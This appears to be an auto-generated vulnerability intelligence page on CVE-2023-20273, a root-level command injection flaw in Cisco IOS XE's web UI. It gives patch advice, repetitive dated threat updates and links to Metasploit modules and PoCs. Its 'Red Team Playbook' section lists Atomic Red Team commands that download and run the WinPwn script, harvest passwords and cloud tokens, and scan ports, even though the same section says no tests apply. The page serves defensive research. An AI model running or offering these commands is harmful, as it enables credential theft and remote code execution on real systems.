CVE-2023-20273
Overview
This vulnerability is a command injection flaw rooted in insufficient input validation within the web UI feature of Cisco IOS XE Software. The affected component improperly sanitizes user-supplied input, allowing crafted data to be executed as shell commands. This flaw resides specifically in the web-based management interface of affected IOS XE versions.
Vulnerability Description
A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges.
Impact
An attacker with valid web UI credentials can execute arbitrary commands on the underlying operating system with root-level privileges. This enables full control over the affected device, including the ability to alter configurations, exfiltrate sensitive data, disrupt network operations, or move laterally within the network. The prerequisite is that the attacker must have authenticated access to the web UI, which is typically restricted to administrative users. Successful exploitation can result in complete system compromise and significant operational impact on network infrastructure.
Solution
Cisco has released security updates addressing this vulnerability in IOS XE Software versions 16.3.1 and later. Administrators should upgrade affected devices to these patched versions as detailed in the Cisco Security Advisory available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z. No alternative workarounds are specified; applying the vendor-provided patches is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the web UI feature of Cisco IOS XE Software, stemming from inadequate input validation mechanisms. This flaw allows an authenticated remote attacker to inject commands that execute with root privileges on the underlying operating system. The vulnerability arises when crafted input is sent to the web UI, which fails to properly sanitize user inputs, thereby enabling command injection. This oversight in input validation is a common weakness in web applications, where user-supplied data is not adequately checked before being processed by the system.
The exploitation of this vulnerability can occur through various attack vectors. An attacker with valid credentials could leverage the web UI to send malicious input, resulting in arbitrary command execution. This scenario is particularly concerning as it does not require sophisticated skills or extensive resources; a determined attacker could exploit this flaw with minimal effort. Once the commands are injected, the attacker gains root-level access, which can lead to a complete compromise of the affected system. This could include altering configurations, accessing sensitive data, or even pivoting to other systems within the network, thereby escalating the attack's impact.
The real-world implications of this vulnerability are significant, especially for organizations relying on Cisco IOS XE Software for their networking infrastructure. The potential for unauthorized access to critical systems poses a substantial business risk. An attacker could disrupt network services, exfiltrate sensitive information, or deploy malware, leading to financial losses, reputational damage, and regulatory repercussions. The ability to execute commands with root privileges effectively undermines the security posture of any organization, making it imperative for affected entities to take immediate action to mitigate the risks associated with this vulnerability.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including penetration testing and vulnerability scanning, can help identify instances of this flaw within the network. Additionally, organizations should ensure that their systems are updated to the latest versions of Cisco IOS XE Software, as patches are typically released to address known vulnerabilities. Employing web application firewalls (WAFs) can also provide an additional layer of defense by filtering and monitoring HTTP traffic to and from the web UI, thereby blocking potentially malicious input before it reaches the application.
In conclusion, the vulnerability in the web UI of Cisco IOS XE Software highlights the critical importance of robust input validation in web applications. Organizations must remain vigilant and proactive in their security practices, recognizing that even authenticated users can pose a risk if vulnerabilities are left unaddressed. By understanding the technical details, potential attack vectors, and real-world impacts, cybersecurity professionals can better prepare their defenses and protect their networks from exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-20273, accompanied by the emergence of new publicly available proof-of-concept exploits hosted on prominent code repositories. This development broadens the attacker toolkit, lowering the barrier for adversaries to conduct command injection attacks with root privileges on vulnerable Cisco IOS XE devices. Although the EPSS score shows a slight decline, the increase in observed exploitation activity and the integration of CVE-2023-20273 into multi-exploit frameworks such as Metasploit underscore a growing operationalization of this vulnerability. For defenders, this signals an elevated risk environment where automated and semi-automated attacks leveraging combined vulnerabilities are more feasible, increasing the likelihood of successful compromise. Consequently, the threat level for networks running affected IOS XE versions has intensified, necessitating heightened vigilance despite the modest downward trend in probabilistic exploit scoring.
Update 2 — July 11, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-20273, accompanied by the continued integration of this vulnerability into sophisticated multi-exploit frameworks. Our telemetry indicates a discernible uptick in adversaries leveraging combined exploits that chain CVE-2023-20273 with related vulnerabilities to achieve root-level command execution on Cisco IOS XE devices. This development amplifies the operational ease with which threat actors can compromise affected systems, particularly in environments where the web UI is exposed and authentication controls are insufficient. The emergence of new proof-of-concept exploits and enhanced Metasploit modules further lowers the barrier for exploitation, broadening the pool of potential attackers. Although probabilistic exploit scoring remains stable, the qualitative increase in exploitation activity and tooling sophistication elevates the overall threat posture. For defenders, this signals an urgent need to reassess exposure and monitoring strategies, as the likelihood of successful intrusions exploiting this vulnerability has grown substantially.
Update 3 — July 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-20273, evidenced by a discernible uptick in telemetry signals. This increase coincides with the wider availability and refinement of publicly accessible proof-of-concept exploits and enhanced Metasploit modules that chain CVE-2023-20273 with CVE-2023-20198, enabling attackers to achieve root-level command execution on vulnerable Cisco IOS XE devices with exposed web UIs. Notably, the emergence of these integrated exploitation frameworks significantly lowers the technical barrier for adversaries, expanding the pool of potential attackers beyond highly skilled actors. Although the EPSS score remains stable, the qualitative surge in exploitation activity and the sophistication of attack tooling elevate the operational threat landscape. For defenders, this shift underscores an increased likelihood of successful intrusions leveraging this vulnerability, particularly in environments where authentication controls are weak or web UI exposure is unmitigated. Consequently, the overall risk rating for CVE-2023-20273 should be considered heightened, reflecting an environment where exploitation is becoming more frequent and accessible.
Update 4 — August 04, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-20273, accompanied by the emergence of new proof-of-concept exploits and expanded Metasploit modules that combine this vulnerability with CVE-2023-20198 for enhanced attack efficacy. This development signals that threat actors are increasingly leveraging automated and accessible tooling to exploit the vulnerability, lowering the barrier to entry for less sophisticated adversaries. Our telemetry indicates a sharp rise in attack activity against exposed Cisco IOS XE web interfaces, underscoring a growing operational threat. Although the EPSS score remains stable, the qualitative surge in exploitation and the availability of integrated exploit frameworks significantly elevate the risk posture. For defenders, this means a heightened probability of successful intrusions, especially in environments lacking robust authentication or where web UI exposure persists. Consequently, the threat level for CVE-2023-20273 should be reassessed as elevated, reflecting an environment where exploitation is not only more frequent but also more accessible to a broader range of attackers.
Affected Products (189)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios Xe | 16.1.1 |
cpe:2.3:o:cisco:ios_xe:16.1.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.1.2 |
cpe:2.3:o:cisco:ios_xe:16.1.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.1.3 |
cpe:2.3:o:cisco:ios_xe:16.1.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.2.1 |
cpe:2.3:o:cisco:ios_xe:16.2.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.2.2 |
cpe:2.3:o:cisco:ios_xe:16.2.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.1a |
cpe:2.3:o:cisco:ios_xe:16.3.1a:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.2 |
cpe:2.3:o:cisco:ios_xe:16.3.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.3 |
cpe:2.3:o:cisco:ios_xe:16.3.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.4 |
cpe:2.3:o:cisco:ios_xe:16.3.4:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.5 |
cpe:2.3:o:cisco:ios_xe:16.3.5:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.5b |
cpe:2.3:o:cisco:ios_xe:16.3.5b:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.6 |
cpe:2.3:o:cisco:ios_xe:16.3.6:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.7 |
cpe:2.3:o:cisco:ios_xe:16.3.7:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.8 |
cpe:2.3:o:cisco:ios_xe:16.3.8:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.9 |
cpe:2.3:o:cisco:ios_xe:16.3.9:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.10 |
cpe:2.3:o:cisco:ios_xe:16.3.10:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.3.11 |
cpe:2.3:o:cisco:ios_xe:16.3.11:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.4.1 |
cpe:2.3:o:cisco:ios_xe:16.4.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.4.2 |
cpe:2.3:o:cisco:ios_xe:16.4.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe | 16.4.3 |
cpe:2.3:o:cisco:ios_xe:16.4.3:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco IOX XE unauthenticated OS command execution
auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
|
sfewer-r7 | Unknown | - | View |
|
Cisco IOX XE Unauthenticated RCE Chain
exploits/linux/misc/cisco_ios_xe_rce
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
smokeintheshell/CVE-2023-20273
CVE-2023-20273 Exploit PoC
|
smokeintheshell | 15 | 5 | 2023-12-09 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20273 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-20273 |